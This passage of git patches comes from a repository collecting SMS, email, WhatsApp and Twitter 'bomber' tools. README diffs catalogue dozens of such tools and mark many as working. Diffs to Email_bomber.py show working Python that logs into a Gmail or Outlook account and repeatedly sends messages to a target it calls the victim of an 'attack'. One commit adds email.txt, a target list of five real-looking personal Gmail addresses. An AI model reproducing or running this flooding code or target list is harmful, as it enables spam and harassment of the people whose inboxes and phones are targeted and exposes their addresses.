### SMS BOMBERS :calling: :boom: -![Working](https://placehold.it/15/0000FF/0000FF/?text=+) 1. Sms_bomber.py -> sending continues sms from using one single link. +![Working](https://via.placeholder.com/15/c5f015/000000?text=+) 1. Sms_bomber.py -> sending continues sms from using one single link. NOTE: Sms_bomber.py is now working too Thanks to [Ghost](https://github.com/ghost). Also refer: Sms_bomber_updated.py -![Others](https://placehold.it/15/00FF00/00FF00/?text=+) 2. Sms_bomber_version2.py -> sending continues sms from using one Multiple links. +![Others](https://via.placeholder.com/15/1589F0/000000?text=+) 2. Sms_bomber_version2.py -> sending continues sms from using one Multiple links. -![Working](https://placehold.it/15/0000FF/0000FF/?text=+) 3. bomb3r 💣 -> sending continues sms from on specified mobile number (25 different sms providers)- by iMro0t +![Working](https://via.placeholder.com/15/c5f015/000000?text=+) 3. bomb3r 💣 -> sending continues sms from on specified mobile number (25 different sms providers)- by iMro0t -![Others](https://placehold.it/15/00FF00/00FF00/?text=+) 4. numspy_bomber.py -> Numspy bomber sending multiple free messages using numspy module. (Currently not working need to update) +![Others](https://via.placeholder.com/15/1589F0/000000?text=+) 4. numspy_bomber.py -> Numspy bomber sending multiple free messages using numspy module. (Currently not working need to update) -![Others](https://placehold.it/15/00FF00/00FF00/?text=+) 5. SmS-BomB -> Your Own SmS BomBer...!!! - by [Bhai4You](https://github.com/Bhai4You) +![Others](https://via.placeholder.com/15/1589F0/000000?text=+) 5. SmS-BomB -> Your Own SmS BomBer...!!! - by [Bhai4You](https://github.com/Bhai4You) -![Others](https://placehold.it/15/00FF00/00FF00/?text=+) 6. SpamSms -> Spamming mobile number with OTP. - by KANG-NEWBIE +![Others](https://via.placeholder.com/15/1589F0/000000?text=+) 6. SpamSms -> Spamming mobile number with OTP. - by KANG-NEWBIE -![Others](https://placehold.it/15/00FF00/00FF00/?text=+) 7. C-SpamMasal -> Spamming mobile number with OTP. - by KANG-NEWBIE +![Others](https://via.placeholder.com/15/1589F0/000000?text=+) 7. C-SpamMasal -> Spamming mobile number with OTP. - by KANG-NEWBIE -![Others](https://placehold.it/15/00FF00/00FF00/?text=+) 8. SMS-BOMBER -> SMS Bomber. - by jdleo +![Others](https://via.placeholder.com/15/1589F0/000000?text=+) 8. SMS-BOMBER -> SMS Bomber. - by jdleo -![Working](https://placehold.it/15/0000FF/0000FF/?text=+) 9. SMS spamming using email address -> SMS using email. - by metachar +![Working](https://via.placeholder.com/15/c5f015/000000?text=+) 9. SMS spamming using email address -> SMS using email. - by metachar -![Working](https://placehold.it/15/0000FF/0000FF/?text=+) 10. TBomb -> SMS Bomber(Ubuntu/termux) - by TheSpeedX +![Working](https://via.placeholder.com/15/c5f015/000000?text=+) 10. TBomb -> SMS Bomber(Ubuntu/termux) - by TheSpeedX -![Others](https://placehold.it/15/00FF00/00FF00/?text=+) 11. smsBomb -> SMS Bomber. - by shellvon +![Others](https://via.placeholder.com/15/1589F0/000000?text=+) 11. smsBomb -> SMS Bomber. - by shellvon -![Others](https://placehold.it/15/00FF00/00FF00/?text=+) 12. sms-bomber -> SMS Bomber. - by aarnhub +![Others](https://via.placeholder.com/15/1589F0/000000?text=+) 12. sms-bomber -> SMS Bomber. - by aarnhub -![Others](https://placehold.it/15/00FF00/00FF00/?text=+) 13. Reborn SMS Bomber For Termux and Linux -> Reborn SMS Bomber. - by 4nat +![Others](https://via.placeholder.com/15/1589F0/000000?text=+) 13. Reborn SMS Bomber For Termux and Linux -> Reborn SMS Bomber. - by 4nat -![Working](https://placehold.it/15/0000FF/0000FF/?text=+) 14. ni_bomber -> SMS Bomber - by Nikait +![Working](https://via.placeholder.com/15/c5f015/000000?text=+) 14. ni_bomber -> SMS Bomber - by Nikait -![Working](https://placehold.it/15/0000FF/0000FF/?text=+) 15. YetAnotherSMSBomber -> Sms Bomber. - by AvinashReddy3108 +![Working](https://via.placeholder.com/15/c5f015/000000?text=+) 15. YetAnotherSMSBomber -> Sms Bomber. - by AvinashReddy3108 -![Others](https://placehold.it/15/00FF00/00FF00/?text=+) 16. smsbomb -> Sms Bomber. - by 1d8 +![Others](https://via.placeholder.com/15/1589F0/000000?text=+) 16. smsbomb -> Sms Bomber. - by 1d8 -![Others](https://placehold.it/15/00FF00/00FF00/?text=+) 17. XLR8_BOMBER -> Superfast SMS bomber for linux and termux. - by anubhavanonymous +![Others](https://via.placeholder.com/15/1589F0/000000?text=+) 17. XLR8_BOMBER -> Superfast SMS bomber for linux and termux. - by anubhavanonymous ### EMAIL BOMBERS :e-mail: :boom: -![Working](https://placehold.it/15/0000FF/0000FF/?text=+) 1. Email_bomber.py -> sending continues email. Update with Outlook bomber as well - by [xyzricky](https://github.com/xyzricky) +![Working](https://via.placeholder.com/15/c5f015/000000?text=+) 1. Email_bomber.py -> sending continues email. Update with Outlook bomber as well - by [xyzricky](https://github.com/xyzricky) -![Working](https://placehold.it/15/0000FF/0000FF/?text=+) 2. Email_bomber -> sending continues email -by [zanyarjamal](https://github.com/zanyarjamal) +![Working](https://via.placeholder.com/15/c5f015/000000?text=+) 2. Email_bomber -> sending continues email -by [zanyarjamal](https://github.com/zanyarjamal) -![Working](https://placehold.it/15/0000FF/0000FF/?text=+) 3. Email_bomb -> sending continues email using your yahoo and gmail account-by [MrMugiwara](https://github.com/MrMugiwara) +![Working](https://via.placeholder.com/15/c5f015/000000?text=+) 3. Email_bomb -> sending continues email using your yahoo and gmail account-by [MrMugiwara](https://github.com/MrMugiwara) -![Others](https://placehold.it/15/00FF00/00FF00/?text=+) 4. EmBomber -> Email Bomber. - by MazenElzanaty +![Others](https://via.placeholder.com/15/1589F0/000000?text=+) 4. EmBomber -> Email Bomber. - by MazenElzanaty -![Working](https://placehold.it/15/0000FF/0000FF/?text=+) 5. Python---Email-Bomber -> Email Bomber. - by ncorbuk +![Working](https://via.placeholder.com/15/c5f015/000000?text=+) 5. Python---Email-Bomber -> Email Bomber. - by ncorbuk -![Working](https://placehold.it/15/0000FF/0000FF/?text=+) 6. EmailPySpam -> Email Bomber. - by Curioo +![Working](https://via.placeholder.com/15/c5f015/000000?text=+) 6. EmailPySpam -> Email Bomber. - by Curioo -![Others](https://placehold.it/15/00FF00/00FF00/?text=+) 7. Email-Spammer -> Email Bomber. - by Juniorn1003 +![Working](https://via.placeholder.com/15/c5f015/000000?text=+)7. Email-Spammer -> Email Bomber. - by Juniorn1003 -![Working](https://placehold.it/15/0000FF/0000FF/?text=+) 8. Email-Bomber -> Email Bomber. - by mohinparamasivam +![Working](https://via.placeholder.com/15/c5f015/000000?text=+) 8. Email-Bomber -> Email Bomber. - by mohinparamasivam -![Working](https://placehold.it/15/0000FF/0000FF/?text=+) 9. Fast Mail Bomber -> Fast, multithreading, efficient and easy-to-use mail bombing/spamming tool. Sending mails via mailman services hosted by different providers. - by juzeon +![Working](https://via.placeholder.com/15/c5f015/000000?text=+) 9. Fast Mail Bomber -> Fast, multithreading, efficient and easy-to-use mail bombing/spamming tool. Sending mails via mailman services hosted by different providers. - by juzeon ### Whats-app Bombers :calling: :boom: -![Working](https://placehold.it/15/0000FF/0000FF/?text=+) 1. wbomb.py -> Whatsapp-bomber sending multipal message to a single user +![Working](https://via.placeholder.com/15/c5f015/000000?text=+) 1. wbomb.py -> Whatsapp-bomber sending multipal message to a single user -![Working](https://placehold.it/15/0000FF/0000FF/?text=+) 2. whatabomb -> Whats-app bomber GUI - by [tbhaxor](https://github.com/tbhaxor) +![Working](https://via.placeholder.com/15/c5f015/000000?text=+) 2. whatabomb -> Whats-app bomber GUI - by [tbhaxor](https://github.com/tbhaxor) -![Others](https://placehold.it/15/00FF00/00FF00/?text=+) 3. wbomb_version2.py (coming soon) -> Whatsapp-bomber sending multipal message to multipal users. +![Others](https://via.placeholder.com/15/1589F0/000000?text=+) 3. wbomb_version2.py (coming soon) -> Whatsapp-bomber sending multipal message to multipal users. -![Not-Working](https://placehold.it/15/FF0000/FF0000/?text=+) 4. WhatsApp-Bomber -> WhatsApp Monitor+Bomber (Chrome Extension) - by [rizwansoaib](https://github.com/rizwansoaib) +![Not-Working](https://via.placeholder.com/15/f03c15/000000?text=+) 4. WhatsApp-Bomber -> WhatsApp Monitor+Bomber (Chrome Extension) - by [rizwansoaib](https://github.com/rizwansoaib) -![Others](https://placehold.it/15/00FF00/00FF00/?text=+) 5. WhatsApp-Spam -> WhatsApp-Spam scripts - by [macr1408](https://github.com/macr1408) +![Others](https://via.placeholder.com/15/1589F0/000000?text=+) 5. WhatsApp-Spam -> WhatsApp-Spam scripts - by [macr1408](https://github.com/macr1408) ### Twitter Bombers :boom: -![Working](https://placehold.it/15/0000FF/0000FF/?text=+) 1. Twitter_bomber.py -> Twitter-bomber this will allow spamming the twitter inbox of a person with the message you want, the person who is using this must make sure that the inbox of the user who will be spammed is open - by [akshaykalucha3](https://github.com/akshaykalucha3) +![Working](https://via.placeholder.com/15/c5f015/000000?text=+) 1. Twitter_bomber.py -> Twitter-bomber this will allow spamming the twitter inbox of a person with the message you want, the person who is using this must make sure that the inbox of the user who will be spammed is open - by [akshaykalucha3](https://github.com/akshaykalucha3) ### Others: -![Working](https://placehold.it/15/0000FF/0000FF/?text=+) 1. https://mailspammer.cf - Email Spammer Website. Spam piles and piles of emails! - by [WOLFIE_OG](https://github.com/WOLFIE-OG) +![Working](https://via.placeholder.com/15/c5f015/000000?text=+) 1. https://mailspammer.cf - Email Spammer Website. Spam piles and piles of emails! - by [WOLFIE_OG](https://github.com/WOLFIE-OG) -![Others](https://placehold.it/15/00FF00/00FF00/?text=+) 2. HPomb -> HPomb Call, SMS and mail bomber all in one - by [HoneyPots0](https://github.com/HoneyPots0) +![Others](https://via.placeholder.com/15/1589F0/000000?text=+) 2. HPomb -> HPomb Call, SMS and mail bomber all in one - by [HoneyPots0](https://github.com/HoneyPots0) -![Working](https://placehold.it/15/0000FF/0000FF/?text=+) 3. bomberthon -> Best Bombing Tool with WhatsApp, Instagram, SMS bomber - by [b31ngD3v](https://github.com/b31ngD3v) +![Working](https://via.placeholder.com/15/c5f015/000000?text=+) 3. bomberthon -> Best Bombing Tool with WhatsApp, Instagram, SMS bomber - by [b31ngD3v](https://github.com/b31ngD3v) -![Working](https://placehold.it/15/0000FF/0000FF/?text=+) 4. PySpam -> Spam for pc {not work ok phone} - by [timofey260](https://github.com/timofey260) +![Working](https://via.placeholder.com/15/c5f015/000000?text=+) 4. PySpam -> Spam for pc {not work ok phone} - by [timofey260](https://github.com/timofey260) ## Contributors: From f1a10b9eaa344dfd5aad5331540b1a52a6ac7516 Mon Sep 17 00:00:00 2001 From: "Sameer Bhatt (debugger)" <22076778+bhattsameer@users.noreply.github.com> Date: Mon, 12 Apr 2021 22:00:11 +0530 Subject: [PATCH 28/58] Modified Readme Look Modified Readme Look --- README.md | 151 +++++++++++++++++++++++------------------------------- 1 file changed, 63 insertions(+), 88 deletions(-) diff --git a/README.md b/README.md index 203f0ca..c2975a4 100644 --- a/README.md +++ b/README.md @@ -1,110 +1,85 @@ # :boom::bomb::bomb::bomb: BOMBERs :bomb::bomb::bomb::boom: 𝕊𝕄𝕊/𝔼𝕞𝕒𝕚𝕝/𝕨𝕙𝕒𝕥𝕤𝕒𝕡𝕡/Twitter/Instagram 𝔹𝕠𝕞𝕓𝕖𝕣𝕤 ℂ𝕠𝕝𝕝𝕖𝕔𝕥𝕚𝕠𝕟. ♡ -![Working](https://via.placeholder.com/15/c5f015/000000?text=+) : Working
-![Not-Working](https://via.placeholder.com/15/f03c15/000000?text=+) : Not- Working (Or need some modifications)
-![Others](https://via.placeholder.com/15/1589F0/000000?text=+) : Others (pending, Some anothers issues OR not checked that is it working or not.)
+| Status | Description | Color Code | +|--------|-------------|------------| +|Working| The Script is working. | ![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | +|Not- Working| Scripts are not working Or need some modifications.|![Not-Working](https://via.placeholder.com/15/f03c15/000000?text=+) | +|Others| Pending, Some anothers issues OR not checked that is it working or not.| ![Others](https://via.placeholder.com/15/1589F0/000000?text=+)| ### SMS BOMBERS :calling: :boom: - -![Working](https://via.placeholder.com/15/c5f015/000000?text=+) 1. Sms_bomber.py -> sending continues sms from using one single link. - NOTE: Sms_bomber.py is now working too Thanks to [Ghost](https://github.com/ghost). Also refer: Sms_bomber_updated.py - -![Others](https://via.placeholder.com/15/1589F0/000000?text=+) 2. Sms_bomber_version2.py -> sending continues sms from using one Multiple links. - -![Working](https://via.placeholder.com/15/c5f015/000000?text=+) 3. bomb3r 💣 -> sending continues sms from on specified mobile number (25 different sms providers)- by iMro0t - -![Others](https://via.placeholder.com/15/1589F0/000000?text=+) 4. numspy_bomber.py -> Numspy bomber sending multiple free messages using numspy module. (Currently not working need to update) - -![Others](https://via.placeholder.com/15/1589F0/000000?text=+) 5. SmS-BomB -> Your Own SmS BomBer...!!! - by [Bhai4You](https://github.com/Bhai4You) - -![Others](https://via.placeholder.com/15/1589F0/000000?text=+) 6. SpamSms -> Spamming mobile number with OTP. - by KANG-NEWBIE - -![Others](https://via.placeholder.com/15/1589F0/000000?text=+) 7. C-SpamMasal -> Spamming mobile number with OTP. - by KANG-NEWBIE - -![Others](https://via.placeholder.com/15/1589F0/000000?text=+) 8. SMS-BOMBER -> SMS Bomber. - by jdleo - -![Working](https://via.placeholder.com/15/c5f015/000000?text=+) 9. SMS spamming using email address -> SMS using email. - by metachar - -![Working](https://via.placeholder.com/15/c5f015/000000?text=+) 10. TBomb -> SMS Bomber(Ubuntu/termux) - by TheSpeedX - -![Others](https://via.placeholder.com/15/1589F0/000000?text=+) 11. smsBomb -> SMS Bomber. - by shellvon - -![Others](https://via.placeholder.com/15/1589F0/000000?text=+) 12. sms-bomber -> SMS Bomber. - by aarnhub - -![Others](https://via.placeholder.com/15/1589F0/000000?text=+) 13. Reborn SMS Bomber For Termux and Linux -> Reborn SMS Bomber. - by 4nat - -![Working](https://via.placeholder.com/15/c5f015/000000?text=+) 14. ni_bomber -> SMS Bomber - by Nikait - -![Working](https://via.placeholder.com/15/c5f015/000000?text=+) 15. YetAnotherSMSBomber -> Sms Bomber. - by AvinashReddy3108 - -![Others](https://via.placeholder.com/15/1589F0/000000?text=+) 16. smsbomb -> Sms Bomber. - by 1d8 - -![Others](https://via.placeholder.com/15/1589F0/000000?text=+) 17. XLR8_BOMBER -> Superfast SMS bomber for linux and termux. - by anubhavanonymous +| Sr.No. | Name | Description | Developed By | Status | +|--------|------|--------------|-------------|--------| +|1.| Sms_bomber.py | Sending continues sms from using one single link. NOTE: Sms_bomber.py is now working too Thanks to [Ghost](https://github.com/ghost). Also refer: Sms_bomber_updated.py | bhattsameer| ![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | +|2.| Sms_bomber_version2.py | Sending continues sms from using one Multiple links.| bhattsameer| ![Others](https://via.placeholder.com/15/1589F0/000000?text=+)| +|3.| bomb3r 💣 |Sending continues sms from on specified mobile number (25 different sms providers) |iMro0t | ![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | +|4.| numspy_bomber.py | Numspy bomber sending multiple free messages using numspy module. (Currently not working need to update) |bhattsameer|![Others](https://via.placeholder.com/15/1589F0/000000?text=+) | +|5.| SmS-BomB| Your Own SmS BomBer...!!! |[Bhai4You](https://github.com/Bhai4You) |![Others](https://via.placeholder.com/15/1589F0/000000?text=+) | +|6.| SpamSms |Spamming mobile number with OTP.|KANG-NEWBIE|![Others](https://via.placeholder.com/15/1589F0/000000?text=+)| +|7.| C-SpamMasal |Spamming mobile number with OTP. |KANG-NEWBIE|![Others](https://via.placeholder.com/15/1589F0/000000?text=+) | +|8.| SMS-BOMBER |SMS Bomber.|jdleo|![Others](https://via.placeholder.com/15/1589F0/000000?text=+) | +|9.| SMS spamming using email address | SMS using email. | metachar|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | +|10.| TBomb |SMS Bomber(Ubuntu/termux) | TheSpeedX|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | +|11.| smsBomb |SMS Bomber.| shellvon|![Others](https://via.placeholder.com/15/1589F0/000000?text=+) | +|12.| sms-bomber| SMS Bomber. |aarnhub|![Others](https://via.placeholder.com/15/1589F0/000000?text=+) | +|13.| Reborn SMS Bomber For Termux and Linux|Reborn SMS Bomber. |4nat|![Others](https://via.placeholder.com/15/1589F0/000000?text=+) | +|14.| ni_bomber |SMS Bomber |Nikait|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | +|15.| YetAnotherSMSBomber|Sms Bomber.|AvinashReddy3108|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | +|16.| smsbomb|Sms Bomber.|1d8|![Others](https://via.placeholder.com/15/1589F0/000000?text=+) | +|17.| XLR8_BOMBER|Superfast SMS bomber for linux and termux. |anubhavanonymous |![Others](https://via.placeholder.com/15/1589F0/000000?text=+) | ### EMAIL BOMBERS :e-mail: :boom: - -![Working](https://via.placeholder.com/15/c5f015/000000?text=+) 1. Email_bomber.py -> sending continues email. Update with Outlook bomber as well - by [xyzricky](https://github.com/xyzricky) - -![Working](https://via.placeholder.com/15/c5f015/000000?text=+) 2. Email_bomber -> sending continues email -by [zanyarjamal](https://github.com/zanyarjamal) - -![Working](https://via.placeholder.com/15/c5f015/000000?text=+) 3. Email_bomb -> sending continues email using your yahoo and gmail account-by [MrMugiwara](https://github.com/MrMugiwara) - -![Others](https://via.placeholder.com/15/1589F0/000000?text=+) 4. EmBomber -> Email Bomber. - by MazenElzanaty - -![Working](https://via.placeholder.com/15/c5f015/000000?text=+) 5. Python---Email-Bomber -> Email Bomber. - by ncorbuk - -![Working](https://via.placeholder.com/15/c5f015/000000?text=+) 6. EmailPySpam -> Email Bomber. - by Curioo - -![Working](https://via.placeholder.com/15/c5f015/000000?text=+)7. Email-Spammer -> Email Bomber. - by Juniorn1003 - -![Working](https://via.placeholder.com/15/c5f015/000000?text=+) 8. Email-Bomber -> Email Bomber. - by mohinparamasivam - -![Working](https://via.placeholder.com/15/c5f015/000000?text=+) 9. Fast Mail Bomber -> Fast, multithreading, efficient and easy-to-use mail bombing/spamming tool. Sending mails via mailman services hosted by different providers. - by juzeon +| Sr.No. | Name | Description | Developed By | Status | +|--------|------|--------------|-------------|--------| +|1.| Email_bomber.py |Sending continues email. Update with Outlook bomber as well |[xyzricky](https://github.com/xyzricky)|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | +|2.| Email_bomber |Sending continues email. |[zanyarjamal](https://github.com/zanyarjamal) |![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | +|3.| Email_bomb |Sending continues email using your yahoo and gmail account.|[MrMugiwara](https://github.com/MrMugiwara)|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | +|4.| EmBomber| Email Bomber. |MazenElzanaty|![Others](https://via.placeholder.com/15/1589F0/000000?text=+)| +|5.| Python---Email-Bomber | Email Bomber.| ncorbuk|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | +|6.| EmailPySpam |Email Bomber.|Curioo|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | +|7.| Email-Spammer | Email Bomber. | Juniorn1003|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | +|8.| Email-Bomber |Email Bomber.|mohinparamasivam|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | +|9.| Fast Mail Bomber |Fast, multithreading, efficient and easy-to-use mail bombing/spamming tool. Sending mails via mailman services hosted by different providers. | juzeon|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | ### Whats-app Bombers :calling: :boom: - -![Working](https://via.placeholder.com/15/c5f015/000000?text=+) 1. wbomb.py -> Whatsapp-bomber sending multipal message to a single user - -![Working](https://via.placeholder.com/15/c5f015/000000?text=+) 2. whatabomb -> Whats-app bomber GUI - by [tbhaxor](https://github.com/tbhaxor) - -![Others](https://via.placeholder.com/15/1589F0/000000?text=+) 3. wbomb_version2.py (coming soon) -> Whatsapp-bomber sending multipal message to multipal users. - -![Not-Working](https://via.placeholder.com/15/f03c15/000000?text=+) 4. WhatsApp-Bomber -> WhatsApp Monitor+Bomber (Chrome Extension) - by [rizwansoaib](https://github.com/rizwansoaib) - -![Others](https://via.placeholder.com/15/1589F0/000000?text=+) 5. WhatsApp-Spam -> WhatsApp-Spam scripts - by [macr1408](https://github.com/macr1408) +| Sr.No. | Name | Description | Developed By | Status | +|--------|------|--------------|-------------|--------| +|1.| wbomb.py| Whatsapp-bomber sending multipal message to a single user.|bhattsameer|![Working](https://via.placeholder.com/15/c5f015/000000?text=+)| +|2.| whatabomb | Whats-app bomber GUI. | [tbhaxor](https://github.com/tbhaxor)|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | +|3.| WhatsApp-Bomber | WhatsApp Monitor+Bomber (Chrome Extension)| [rizwansoaib](https://github.com/rizwansoaib)|![Not-Working](https://via.placeholder.com/15/f03c15/000000?text=+)| +|4.| WhatsApp-Spam | WhatsApp-Spam scripts | [macr1408](https://github.com/macr1408)|![Others](https://via.placeholder.com/15/1589F0/000000?text=+) | ### Twitter Bombers :boom: - -![Working](https://via.placeholder.com/15/c5f015/000000?text=+) 1. Twitter_bomber.py -> Twitter-bomber this will allow spamming the twitter inbox of a person with the message you want, the person who is using this must make sure that the inbox of the user who will be spammed is open - by [akshaykalucha3](https://github.com/akshaykalucha3) +| Sr.No. | Name | Description | Developed By | Status | +|--------|------|--------------|-------------|--------| +|1.| Twitter_bomber.py |Twitter-bomber this will allow spamming the twitter inbox of a person with the message you want, the person who is using this must make sure that the inbox of the user who will be spammed is open. | [akshaykalucha3](https://github.com/akshaykalucha3)|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | ### Others: - -![Working](https://via.placeholder.com/15/c5f015/000000?text=+) 1. https://mailspammer.cf - Email Spammer Website. Spam piles and piles of emails! - by [WOLFIE_OG](https://github.com/WOLFIE-OG) - -![Others](https://via.placeholder.com/15/1589F0/000000?text=+) 2. HPomb -> HPomb Call, SMS and mail bomber all in one - by [HoneyPots0](https://github.com/HoneyPots0) - -![Working](https://via.placeholder.com/15/c5f015/000000?text=+) 3. bomberthon -> Best Bombing Tool with WhatsApp, Instagram, SMS bomber - by [b31ngD3v](https://github.com/b31ngD3v) - -![Working](https://via.placeholder.com/15/c5f015/000000?text=+) 4. PySpam -> Spam for pc {not work ok phone} - by [timofey260](https://github.com/timofey260) +| Sr.No. | Name | Description | Developed By | Status | +|--------|------|--------------|-------------|--------| +|1.| https://mailspammer.cf | Email Spammer Website. Spam piles and piles of emails! |[WOLFIE_OG](https://github.com/WOLFIE-OG)|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | +|2.| HPomb|HPomb Call, SMS and mail bomber all in one. |[HoneyPots0](https://github.com/HoneyPots0)|![Others](https://via.placeholder.com/15/1589F0/000000?text=+)| +|3.| bomberthon |Best Bombing Tool with WhatsApp, Instagram, SMS bomber | [b31ngD3v](https://github.com/b31ngD3v)|![Working](https://via.placeholder.com/15/c5f015/000000?text=+)| +|4.| PySpam | Spam for pc {not work ok phone} | [timofey260](https://github.com/timofey260)|![Working](https://via.placeholder.com/15/c5f015/000000?text=+)| ## Contributors: To keep this collection up-to-date need contributors who can add more mobile/email/whatsapp/twitter scripts and github repo here at one place. - -:octocat: [iMro0t](https://github.com/iMro0t)
-:octocat: [rizwansoaib](https://github.com/rizwansoaib)
-:octocat: [scienceLabwork](https://github.com/scienceLabwork)
-:octocat: [cclauss](https://github.com/cclauss)
-:octocat: [rduttshukla](https://github.com/rduttshukla)
-:octocat: [LucasNcipha](https://github.com/LucasNcipha)
-:octocat: [akshaykalucha3](https://github.com/akshaykalucha3)
-:octocat: [xyzricky](https://github.com/xyzricky)
-:octocat: [timofey260](https://github.com/timofey260)
-:octocat: [juzeon](https://github.com/juzeon)
-:octocat: [Ghost](https://github.com/ghost) +| Contributors | +|--------------| +|:octocat: [iMro0t](https://github.com/iMro0t)| +|:octocat: [rizwansoaib](https://github.com/rizwansoaib)| +|:octocat: [scienceLabwork](https://github.com/scienceLabwork)| +|:octocat: [cclauss](https://github.com/cclauss)| +|:octocat: [rduttshukla](https://github.com/rduttshukla)| +|:octocat: [LucasNcipha](https://github.com/LucasNcipha)| +|:octocat: [akshaykalucha3](https://github.com/akshaykalucha3)| +|:octocat: [xyzricky](https://github.com/xyzricky)| +|:octocat: [timofey260](https://github.com/timofey260)| +|:octocat: [juzeon](https://github.com/juzeon)| +|:octocat: [Ghost](https://github.com/ghost)| ## Note: From 27d3026dff41003034d5c8ed52662cff061b7d7b Mon Sep 17 00:00:00 2001 From: Kumar Saksham Date: Tue, 4 May 2021 13:55:15 +0530 Subject: [PATCH 29/58] Update Email_bomber.py --- Email_bomber.py | 38 ++++++++++++++++++-------------------- 1 file changed, 18 insertions(+), 20 deletions(-) diff --git a/Email_bomber.py b/Email_bomber.py index 1c1674e..cf7c50f 100644 --- a/Email_bomber.py +++ b/Email_bomber.py @@ -1,35 +1,33 @@ import smtplib import time print ("\033[1;31m_________ __ __ ____ ________ __ \033[1;m") -print ("\033[1;34m|########| |##\ /##| /####\ |########| |##| By D3XBugg3R \033[1;m") -print ("\033[1;34m|##|____ |###\ __ /###| /##/\##\ |##| |##| With <3 of T34M GCA \033[1;m") +print ("\033[1;34m|########| |##\ /##| /####\ |########| |##| By @everydaycodings \033[1;m") +print ("\033[1;34m|##|____ |###\ __ /###| /##/\##\ |##| |##| Made with code \033[1;m") print ("\033[1;34m|########| |##| |##| |##| /########\ |##| |##| ____ __ ____ __ ___ \033[1;m") print ("\033[1;31m|##|_____ |##| |##| /##/ \##\ __|##|__ |##|_______ |__| | | |\/| |__| |__ |__| \033[1;m") print ("\033[1;31m|########| |##| |##| /##/ \##\ |########| |##########| _|__| |__| | | _|__| |__ | \ \033[1;m") -try: - bomb_email = input("Enter Email address on Whom you want to perfom this attack: ") - email = input("Enter your gmail_address:") - password = input("Enter your gmail_password:") - message = input("Enter Message:") - counter = int(input("How many message you want to send?:")) +files = open('email.txt', 'r') +bomb_emails = files.readlines() - # gmail of outlook - s_ = input('Select the service provider (Gmail / Outlook): ').lower() - if s_ == "gmail": +email = input("Enter your gmail_address:") +password = input("Enter your gmail_password:") +message = input("Enter Message:") +message_relode = int(input("How many message you want to send?:")) + + +for bomb_email in bomb_emails: + for x in range(0, message_relode): mail = smtplib.SMTP('smtp.gmail.com',587) - elif s_ == "outlook": - mail = smtplib.SMTP('smtp.office365.com',587) - - for x in range(0,counter): - print("Number of Message Sent : ", x+1) mail.ehlo() mail.starttls() mail.login(email,password) mail.sendmail(email,bomb_email,message) - time.sleep(1) + print("message sent to {}".format(bomb_email)) + time.sleep(1) - mail.close() -except Exception as e: - print("Something is wrong, please Re-try Again with Valid input.") +mail.close() +files.close() + +print("Done") From 173b6ef89e18412850db0cc5569bb26b3245127d Mon Sep 17 00:00:00 2001 From: Kumar Saksham Date: Tue, 4 May 2021 13:55:26 +0530 Subject: [PATCH 30/58] Add files via upload --- email.txt | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 email.txt diff --git a/email.txt b/email.txt new file mode 100644 index 0000000..fe02d66 --- /dev/null +++ b/email.txt @@ -0,0 +1,5 @@ +iansarn@gmail.com +ianschramm77@gmail.com +ian.sears1@gmail.com +ian.sheila@gmail.com +ian.sheldon6@gmail.com From f645debf5de16725593b886b65707a6ffe2cd9b1 Mon Sep 17 00:00:00 2001 From: Kumar Saksham Date: Tue, 4 May 2021 15:38:16 +0530 Subject: [PATCH 31/58] Update Email_bomber.py --- Email_bomber.py | 38 ++++++++++++++++++++------------------ 1 file changed, 20 insertions(+), 18 deletions(-) diff --git a/Email_bomber.py b/Email_bomber.py index cf7c50f..1c1674e 100644 --- a/Email_bomber.py +++ b/Email_bomber.py @@ -1,33 +1,35 @@ import smtplib import time print ("\033[1;31m_________ __ __ ____ ________ __ \033[1;m") -print ("\033[1;34m|########| |##\ /##| /####\ |########| |##| By @everydaycodings \033[1;m") -print ("\033[1;34m|##|____ |###\ __ /###| /##/\##\ |##| |##| Made with code \033[1;m") +print ("\033[1;34m|########| |##\ /##| /####\ |########| |##| By D3XBugg3R \033[1;m") +print ("\033[1;34m|##|____ |###\ __ /###| /##/\##\ |##| |##| With <3 of T34M GCA \033[1;m") print ("\033[1;34m|########| |##| |##| |##| /########\ |##| |##| ____ __ ____ __ ___ \033[1;m") print ("\033[1;31m|##|_____ |##| |##| /##/ \##\ __|##|__ |##|_______ |__| | | |\/| |__| |__ |__| \033[1;m") print ("\033[1;31m|########| |##| |##| /##/ \##\ |########| |##########| _|__| |__| | | _|__| |__ | \ \033[1;m") -files = open('email.txt', 'r') -bomb_emails = files.readlines() +try: + bomb_email = input("Enter Email address on Whom you want to perfom this attack: ") + email = input("Enter your gmail_address:") + password = input("Enter your gmail_password:") + message = input("Enter Message:") + counter = int(input("How many message you want to send?:")) + # gmail of outlook + s_ = input('Select the service provider (Gmail / Outlook): ').lower() -email = input("Enter your gmail_address:") -password = input("Enter your gmail_password:") -message = input("Enter Message:") -message_relode = int(input("How many message you want to send?:")) - - -for bomb_email in bomb_emails: - for x in range(0, message_relode): + if s_ == "gmail": mail = smtplib.SMTP('smtp.gmail.com',587) + elif s_ == "outlook": + mail = smtplib.SMTP('smtp.office365.com',587) + + for x in range(0,counter): + print("Number of Message Sent : ", x+1) mail.ehlo() mail.starttls() mail.login(email,password) mail.sendmail(email,bomb_email,message) - print("message sent to {}".format(bomb_email)) - time.sleep(1) + time.sleep(1) -mail.close() -files.close() - -print("Done") + mail.close() +except Exception as e: + print("Something is wrong, please Re-try Again with Valid input.") From b634cd82d117c89f0a58d5f32eca54dcd5a73582 Mon Sep 17 00:00:00 2001 From: Kumar Saksham Date: Tue, 4 May 2021 15:39:39 +0530 Subject: [PATCH 32/58] Create Email_Bomber_Version2 --- 